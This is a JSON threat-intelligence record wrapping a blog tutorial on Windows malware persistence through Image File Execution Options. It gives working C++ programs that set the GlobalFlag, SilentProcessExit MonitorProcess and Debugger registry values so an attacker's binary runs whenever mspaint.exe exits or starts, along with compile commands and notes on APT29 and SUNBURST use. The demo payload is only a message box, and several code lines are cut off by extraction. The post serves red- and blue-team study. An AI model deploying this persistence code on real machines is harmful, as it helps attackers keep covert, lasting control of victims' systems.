{
	"id": "0fa16817-d724-4a05-b4ef-bb25c85cd5f8",
	"created_at": "2026-04-06T00:12:57.516615Z",
	"updated_at": "2026-04-10T13:11:39.893039Z",
	"deleted_at": null,
	"sha1_hash": "3f90d8bf8b6b08fc1eb53f642921b060d9ce72a3",
	"title": "Malware development: persistence - part 10. Using Image File Execution Options. Simple C++ example.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1784894,
	"plain_text": "Malware development: persistence - part 10. Using Image File\r\nExecution Options. Simple C++ example.\r\nBy cocomelonc\r\nPublished: 2022-09-10 · Archived: 2026-04-05 13:02:07 UTC\r\n4 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis post is the result of my own research into one of the interesting malware persistence trick: via Image File\r\nExecution Options.\r\nImage File Execution OptionsPermalink\r\nIFEO enables developers to attach a debugger to an application or process. This allows the debugger/application\r\nto run concurrently with the application being debugged.\r\nHow to set this feature? We can launch a process/program when another application silently exits.\r\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\nPage 1 of 20\n\nSilent exit for an application means the application has been terminated in one of two ways:\r\n1. Self termination by calling ExitProcess\r\n2. Another process terminates the monitored process by calling TerminateProcess\r\nThis is configurable via the following registry key:\r\nHKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\r\npractical examplePermalink\r\nLet’s go to run our malware once Microsoft Paint ( mspaint.exe ) is silently exiting.\r\nSo, let’s say we have our “malware” ( hack.cpp ):\r\n/*\r\nhack.cpp\r\nevil app for windows persistence via IFEO\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#pragma comment (lib, \"user32.lib\")\r\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\r\n MessageBox(NULL, \"Meow-meow!\", \"=^..^=\", MB_OK);\r\n return 0;\r\n}\r\nAs you can see, as usually, I use “meow-meow” message box “malware” =^..^=\r\nThen, create persistence script for modify registry ( pers.cpp ):\r\n/*\r\npers.cpp\r\nwindows persistence via IFEO (GlobalFlag)\r\nauthor: 
@cocomelonc\r\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstring.h\u003e\r\nint main(int argc, char* argv[]) {\r\n HKEY hkey = NULL;\r\n DWORD gF = 512;\r\n DWORD rM = 1;\r\n // image file\r\n const char* img = \"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\mspaint.exe\"\r\n // silent exit\r\n const char* silent = \"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\mspaint.exe\";\r\n // evil app\r\n const char* exe = \"Z:\\\\2022-09-10-malware-pers-10\\\\hack.exe\";\r\n // GlobalFlag\r\n // LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)\"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image\r\n LONG res = RegCreateKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)img, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE | KEY_Q\r\n if (res == ERROR_SUCCESS) {\r\n // create new registry key\r\n // reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\mspaint.exe\" /v G\r\n RegSetValueEx(hkey, (LPCSTR)\"GlobalFlag\", 0, REG_DWORD, (const BYTE*)\u0026gF, sizeof(gF));\r\n RegCloseKey(hkey);\r\n }\r\n // res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)\"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProc\r\n res = RegCreateKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)silent, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE | KEY_QUE\r\n if (res == ERROR_SUCCESS) {\r\n // create new registry key\r\n // reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\" /v ReportingMod\r\n // reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\" /v MonitorProce\r\n RegSetValueEx(hkey, (LPCSTR)\"ReportingMode\", 0, REG_DWORD, (const BYTE*)\u0026rM, sizeof(rM));\r\n RegSetValueEx(hkey, (LPCSTR)\"MonitorProcess\", 0, REG_SZ, (unsigned 
char*)exe, strlen(exe));\r\n RegCloseKey(hkey);\r\n }\r\n return 0;\r\n}\r\nSo what have we done here? Firstly, we created the SilentProcessExit key under\r\nHKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion , then enabled the silent process exit monitoring feature by\r\nadding GlobalFlag :\r\n//...\r\nLONG res = RegCreateKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)img, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE | KEY_QUE\r\n//...\r\n//...\r\n// reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\mspaint.exe\" /v Globa\r\nRegSetValueEx(hkey, (LPCSTR)\"GlobalFlag\", 0, REG_DWORD, (const BYTE*)\u0026gF, sizeof(gF));\r\n//...\r\nBy setting MonitorProcess to ...\\hack.exe and ReportingMode to 1 , every silent exit of mspaint.exe\r\nwill now trigger the execution of our “malware” hack.exe :\r\n//...\r\nRegSetValueEx(hkey, (LPCSTR)\"ReportingMode\", 0, REG_DWORD, (const BYTE*)\u0026rM, sizeof(rM));\r\nRegSetValueEx(hkey, (LPCSTR)\"MonitorProcess\", 0, REG_SZ, (unsigned char*)exe, strlen(exe));\r\ndemo\r\nLet’s see everything in action. Compile the malware:\r\nx86_64-w64-mingw32-g++ -O2 hack.cpp -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nRun it, just to check correctness:\r\nSo, check the registry keys before:\r\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\" /s\r\nalso SilentProcessExit :\r\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\" /s\r\nAs you can see, as expected, some registry keys are missing for our target application. 
So when it starts and closes\r\nnothing happens:\r\nWell, now let’s compile:\r\nx86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nand run our persistence script pers.exe , then check the registry keys again:\r\n.\\pers.exe\r\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\" /s\r\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\" /s\r\nFinally, run mspaint.exe again:\r\nand close it:\r\nThe ReportingMode registry key enables the Windows Error Reporting process ( WerFault.exe ), which will be\r\nthe parent process of the MonitorProcess key value hack.exe :\r\nWerFault.exe - used for tracking errors related to the operating system, Windows features and\r\napplications.\r\nIFEO debugger type\r\nThere is another implementation of IFEO via the Debugger key. 
Just set a debugger for the victim process in this\r\nregistry key:\r\nHKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\mspaint.exe\r\nwhich then only requires the malicious application to be stored in System32 .\r\nThe source code is simple and looks like this:\r\n/*\r\npers2.cpp\r\nwindows persistence via IFEO 2(Debugger)\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstring.h\u003e\r\nint main(int argc, char* argv[]) {\r\n HKEY hkey = NULL;\r\n DWORD gF = 512;\r\n DWORD rM = 1;\r\n // image file\r\n const char* img = \"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\mspaint.exe\"\r\n // evil app\r\n const char* exe = \"hack.exe\";\r\n // Debugger\r\n LONG res = RegCreateKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)img, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE | KEY_Q\r\n if (res == ERROR_SUCCESS) {\r\n // create new registry key\r\n // reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\mspaint.exe\" /v D\r\n RegSetValueEx(hkey, (LPCSTR)\"Debugger\", 0, REG_SZ, (unsigned char*)exe, strlen(exe));\r\n RegCloseKey(hkey);\r\n }\r\n return 0;\r\n}\r\nLet’s compile it:\r\nx86_64-w64-mingw32-g++ -O2 pers2.cpp -o pers2.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata\r\nAn example of how this appears in action:\r\nWhen the 
Microsoft Paint process ( mspaint.exe ) is launched, this will cause the malware to be executed.\r\nPerfect!\r\nThis persistence trick is used by the APT29 group and by software such as SUNBURST in the wild.\r\nI hope this post spreads awareness of this interesting technique to the blue teamers, and adds a weapon to the red\r\nteamers’ arsenal.\r\nATT\u0026CK MITRE: IFEO Injection\r\nMSDN: Monitoring Silent Process Exit\r\nPersistence using GlobalFlags in Image File Execution Options - Hidden from autoruns.exe\r\nAPT29\r\nSUNBURST\r\nsource code on github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time, happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html"
	],
	"report_names": [
		"malware-pers-10.html"
	],
	"threat_actors": [
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434377,
	"ts_updated_at": 1775826699,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3f90d8bf8b6b08fc1eb53f642921b060d9ce72a3.pdf",
		"text": "https://archive.orkl.eu/3f90d8bf8b6b08fc1eb53f642921b060d9ce72a3.txt",
		"img": "https://archive.orkl.eu/3f90d8bf8b6b08fc1eb53f642921b060d9ce72a3.jpg"
	}
}